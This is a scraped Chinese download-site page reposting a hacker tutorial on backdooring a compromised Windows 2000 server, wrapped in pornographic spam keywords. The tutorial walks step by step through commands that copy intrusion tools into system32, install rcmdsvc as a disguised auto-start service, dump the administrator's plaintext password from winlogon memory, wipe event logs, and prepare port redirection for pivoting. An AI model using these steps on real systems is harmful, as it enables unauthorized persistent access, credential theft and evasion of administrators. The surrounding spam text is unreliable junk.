亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? win2k入侵后后門的放置.txt

?? 很多很有用的黑客命令集
?? TXT
字號:
轉]Win2k入侵后后門的放置 
    在閱讀本文之前,假設你已經成功入侵了某臺Win2k主機并取得了管理員帳號。大多數時候我們入侵某臺主機的目的并不是為了直接破壞,可以在該主機上留下后門以便自己以后可以方便的“使用”該機。
    目前一般情況下,入侵Win2k后使用最多的后門是RemoteNc了,但該工具有一很大的缺點,容易被殺毒軟件查出,而且如果用fport或Active Ports等軟件也可以看到它監聽的端口,這很容易讓管理員發現。
對于Win2k下的后門推薦使用Win2k Resoruce Kit中自帶的一個小工具
rcmdsvc.exe和rcmd.exe,這是微軟自己出的一個用來在命令行下遠程
管理主機的小工具。它有以下優點:

1、不會被殺毒軟件認為是病毒或后門程序,畢竟這是微軟自己出的東西。
2、非常隱蔽,它開的端口是445,和Win2k系統的Microsoft-DS服務開的
端口一樣,用fport或Active Ports都不能列出它正在監聽的端口。

下面我們來看一次實際的操作

當然進行以下操作之前假設已經具有以下條件:

1、你已經取得了xxx.xxx.xxx.xxx的管理員權限
2、該機啟用了tcp/ip上的Netbios支持
3、在IP安全策略中對139和445端口未進行屏蔽
4、安全策略中對匿名連接的額外限制采用的是默認的安全選項

/*如果后三條中有某條不能滿足,那么會讓我們的后續操作有些困難,
不過仍然有其它辦法可以繼續,如果大家感興趣我會在以后的文章中說明*/

c:\>net use z: \\xxx.xxx.xxx.xxx "password" /user:"administrator"

c:\>copy rcmdsvc.exe z:\winnt\system32
c:\>copy pulist.exe z:\winnt\system32
c:\>copy findpass.exe z:\winnt\system32
c:\>copy kill.exe z:\winnt\system32
c:\>copy clearel.exe z:\winnt\system32
c:\>copy clealog.cmd z:\winnt\system32
c:\>copy fpipe.exe z:\winnt\system32
c:\>copy msvcp60.dll z:\winnt\system32

/*拷貝一些常用的工具到對方服務器上,在這里對這些工具做一個簡要說明:
rcmdsvc.exe Win2k Resource Kit中的遠程命令行服務器端程序
pulist.exe 可以列出系統進程和該進程所屬用戶的工具
findpass.exe 可以在winlogon.exe進程中查找指定用戶名的名文口令的工具
kill.exe 可以用pdi或進程名殺掉指定進程的工具
clearel.exe 清除系統、應用程序、安全日志的工具
clealog.cmd 同上
fpipe.exe 可以在命令行下做端口重定向的工具
msvcp60.dll vc的運行庫,這個東西其實不是必須的,但為了防止在某些缺少
msvcp60.dll的機上在運行clealog清除日志時對方的機上會突然彈出一個對話
框說缺少msvcp60.dll的尷尬
情況,最好把它一起復制過去。*/

c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath= 
c:\winnt\system32\rcmdsvc.exe type= own start= auto

/*在這里我們用sc在目標機xxx.xxx.xxx.xxx上創建了一個名為Remote Command 
Service的服務,啟動方式為自動。當然為了隱蔽,你最好把“Remote Command 
Service”這個服務名改成其它比較類似系統服務的名字,畢竟管理員不可能
看著一個突然多出來的Remote Command而坐視不管,而且也顯的你太囂張了。*/

/*ps:sc.exe是Win2k Resource Kit中一個功能非常強大的對服務進行控制的工具,
詳細的使用方法可以參考本站的《sc使用完全指南》。*/

c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service"

SERVICE_NAME: rpc support services
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE,NOT_PAUSABLE,
IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0

/*在這里我們用sc啟動剛才創建的Remote Command Service服務。*/ 

/*下面連上對方服務器*/

c:\>rcmd

Enter Server Name : xxx.xxx.xxx.xxx
Connect to \\xxx.xxx.xxx.xxx

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\document. and Settings\Default User.WINNT>pulist

Process           PID  User
Idle              0
System            8
smss.exe          168  NT AUTHORITY\SYSTEM
csrss.exe         192  NT AUTHORITY\SYSTEM
winlogon.exe      212  NT AUTHORITY\SYSTEM
services.exe      240  NT AUTHORITY\SYSTEM
lsass.exe         252  NT AUTHORITY\SYSTEM
svchost.exe       408  NT AUTHORITY\SYSTEM
spoolsv.exe       436  NT AUTHORITY\SYSTEM
msdtc.exe         464  NT AUTHORITY\SYSTEM
svchost.exe       596  NT AUTHORITY\SYSTEM
llssrv.exe        624  NT AUTHORITY\SYSTEM
regsvc.exe        676  NT AUTHORITY\SYSTEM
rpcsvc.exe        692  NT AUTHORITY\SYSTEM
mstask.exe        716  NT AUTHORITY\SYSTEM
LSESS.EXE         792  NT AUTHORITY\SYSTEM
tlntsvr.exe       832  NT AUTHORITY\SYSTEM
VrUpSvr.exe       956  NT AUTHORITY\SYSTEM
winmgmt.exe       968  NT AUTHORITY\SYSTEM
dns.exe           980  NT AUTHORITY\SYSTEM
dfssvc.exe        1064 NT AUTHORITY\SYSTEM
POP3S.exe         1100 NT AUTHORITY\SYSTEM
smtpds.exe        1120 NT AUTHORITY\SYSTEM
svchost.exe       1384 NT AUTHORITY\SYSTEM
dllhost.exe       1316 NT AUTHORITY\SYSTEM
internat.exe      1308 SERVER\Administrator
conime.exe        1680 SERVER\Administrator
VRMONSVC.EXE      872  NT AUTHORITY\SYSTEM
inetinfo.exe      1456 NT AUTHORITY\SYSTEM
explorer.exe      1548 SERVER\Administrator
cmd.exe           1712 SERVER\Guest
pulist.exe        532  SERVER\Guest

/*我們可以看到winlogon.exe的進程號是212*/

C:\document. and Settings\Default User.WINNT>findpass server 
administrator 212

To Find Password in the Winlogon process
Usage: fidp DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.
The WinLogon process id is 214 (0x000000d6).
To find server\administrator password in process 214 ...
The encoded password is found at 0x01a00800 and has a length of 3.
The logon information is: server/administrator/Tgrh87fd.
The hash byte is: 0xb8.

/*在winlogon中查找administrator的名文口令*/

C:\document. and Settings\Default User.WINNT>clealog
clealog done

/*清除日志記錄*/

C:\document. and Settings\Default User.WINNT>

到這里我們已經看到administrator的密碼是Tgrh87fd

至此我們拿到了管理員的密碼并安放了一個rcmdsvc的后門,當然你還可以接著做許多事。比如利用Adam發現的Bug再克隆一個管理員賬號。或者用sc把對方的Tlntsvr服務啟起來。不過后者比較容易被發現,不推薦。如果你對他的內網的某臺機感興趣而且該機也有漏洞,可以用fpipe做端口重定向后為下一步的進攻做準備。
 

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
成人免费小视频| 日本人妖一区二区| 亚洲成av人片在线观看| 久久国产日韩欧美精品| av中文字幕亚洲| 日韩精品一区在线| 久久久久久麻豆| 精品电影一区二区| 亚洲成人精品影院| 成人黄色综合网站| 久久综合九色综合97_久久久| 亚洲一区二区三区四区在线免费观看 | 日本三级韩国三级欧美三级| 成人激情免费视频| 久久先锋资源网| 麻豆一区二区三| 717成人午夜免费福利电影| 国产丝袜在线精品| 九色综合国产一区二区三区| 在线电影欧美成精品| 亚洲一区二区三区爽爽爽爽爽 | av电影在线观看完整版一区二区| 精品三级av在线| 日韩高清在线观看| 欧美日韩精品一区二区在线播放| 亚洲精品视频在线| 99re66热这里只有精品3直播| 亚洲国产精品t66y| 丁香激情综合国产| 日本一区二区高清| 国产91精品久久久久久久网曝门 | 精品久久久久久久久久久久久久久久久 | 亚洲123区在线观看| 欧美日韩在线直播| 亚洲色图制服丝袜| 一区二区三区资源| 亚洲成人免费在线| 99久久99精品久久久久久| 国产女人18水真多18精品一级做| 国内精品视频一区二区三区八戒| 欧美成人r级一区二区三区| 另类小说欧美激情| 精品国产乱码久久久久久久久| 精品一区二区三区免费毛片爱| 欧美mv日韩mv国产网站| 国产伦精品一区二区三区视频青涩| 精品少妇一区二区三区视频免付费| 久久精品久久精品| 日本一区二区在线不卡| 91在线视频官网| 亚洲成av人片一区二区三区| 91精品国产综合久久婷婷香蕉| 美国av一区二区| 欧美国产日韩一二三区| 色乱码一区二区三区88| 五月激情六月综合| 精品国产欧美一区二区| 成人做爰69片免费看网站| 亚洲人成网站影音先锋播放| 欧美疯狂做受xxxx富婆| 久久99精品久久久| 亚洲欧美在线高清| 5月丁香婷婷综合| 国产精品一二一区| 亚洲综合色丁香婷婷六月图片| 欧美绝品在线观看成人午夜影视| 老司机精品视频线观看86| 中文字幕成人av| 欧美高清性hdvideosex| 国产传媒欧美日韩成人| 亚洲电影中文字幕在线观看| 久久免费午夜影院| 欧美性受xxxx| 国产精品一线二线三线| 亚洲电影在线免费观看| 欧美精品一区二区三| 国产经典欧美精品| 欧美三级电影一区| 国产九色精品成人porny| 亚洲日韩欧美一区二区在线| 欧美大片在线观看一区二区| 92国产精品观看| 国产裸体歌舞团一区二区| 日韩电影在线观看一区| 国产精品区一区二区三区| 欧美福利一区二区| 一本色道久久综合亚洲aⅴ蜜桃| 久久福利视频一区二区| 亚洲国产精品久久一线不卡| 国产精品久久久久一区二区三区| 日韩精品中文字幕一区二区三区 | 欧美日韩三级一区二区| 成人一区二区三区| 加勒比av一区二区| 日韩精品成人一区二区在线| 亚洲国产精品传媒在线观看| 国产精品护士白丝一区av| 国产大陆精品国产| 久久精品免费观看| 日韩精品免费专区| 亚洲电影一区二区三区| 亚洲美女视频一区| 国产精品女主播在线观看| 久久亚洲综合av| 日韩欧美区一区二| 日韩一二三四区| 91麻豆精品国产91久久久资源速度 | 一区二区三区视频在线观看| 国产精品久久久久三级| 国产欧美一区二区精品性| 2欧美一区二区三区在线观看视频| 91精品一区二区三区久久久久久 | 白白色 亚洲乱淫| 国产一区不卡视频| 国产在线一区二区| 国产一区二区三区精品视频| 国产 日韩 欧美大片| 国产香蕉久久精品综合网| 久久综合成人精品亚洲另类欧美| 2024国产精品| 久久久一区二区三区| 欧美国产欧美亚州国产日韩mv天天看完整 | 精品国产露脸精彩对白| 91精品国产一区二区| 欧美精品日韩综合在线| 日韩欧美二区三区| 久久蜜桃av一区精品变态类天堂 | 国产精品资源在线| 成人网页在线观看| 一本到高清视频免费精品| 在线看不卡av| 日韩亚洲欧美成人一区| 久久综合久久鬼色| 国产精品人成在线观看免费 | 国产欧美一区视频| 亚洲色图另类专区| 午夜久久福利影院| 韩国av一区二区三区四区| 成人av电影免费观看| 91黄色在线观看| 日韩欧美美女一区二区三区| 国产欧美1区2区3区| 亚洲最大的成人av| 青青草97国产精品免费观看| 国产美女精品一区二区三区| 成+人+亚洲+综合天堂| 欧美在线观看视频在线| 日韩欧美一区二区免费| 国产精品不卡一区二区三区| 亚洲国产日韩a在线播放性色| 精品午夜久久福利影院| 91在线porny国产在线看| 欧美精品第1页| 中文在线一区二区| 日本中文字幕一区二区有限公司| 国产91丝袜在线播放0| 欧美老肥妇做.爰bbww视频| 久久久精品免费网站| 亚洲成人av在线电影| 国产福利视频一区二区三区| 欧美色电影在线| 国产免费成人在线视频| 日韩高清在线一区| 色综合天天在线| 欧美精品一区二区三区蜜桃视频| 一区二区三区免费观看| 国产凹凸在线观看一区二区| 这里只有精品免费| 亚洲女女做受ⅹxx高潮| 国产伦精品一区二区三区视频青涩 | 久久久精品tv| 亚洲视频在线一区观看| 色999日韩国产欧美一区二区| 欧美激情一区在线| 久久先锋影音av鲁色资源网| 亚洲一区免费视频| 成人黄色免费短视频| 欧美va日韩va| 性欧美疯狂xxxxbbbb| 99在线精品观看| 国产日韩精品一区二区三区在线| 男女性色大片免费观看一区二区| 色综合天天综合在线视频| 亚洲国产精品二十页| 国产乱码精品一区二区三区av| 欧美一区二区三区系列电影| 夜夜爽夜夜爽精品视频| 99v久久综合狠狠综合久久| 久久综合色婷婷| 国产一区二区三区av电影| 日韩区在线观看| 免费成人在线视频观看| 欧美日韩国产首页在线观看| 一区二区三区欧美日| 色婷婷综合中文久久一本| 亚洲另类春色校园小说| 99精品桃花视频在线观看| 中文字幕制服丝袜一区二区三区| 成人午夜电影久久影院| 国产精品高潮呻吟|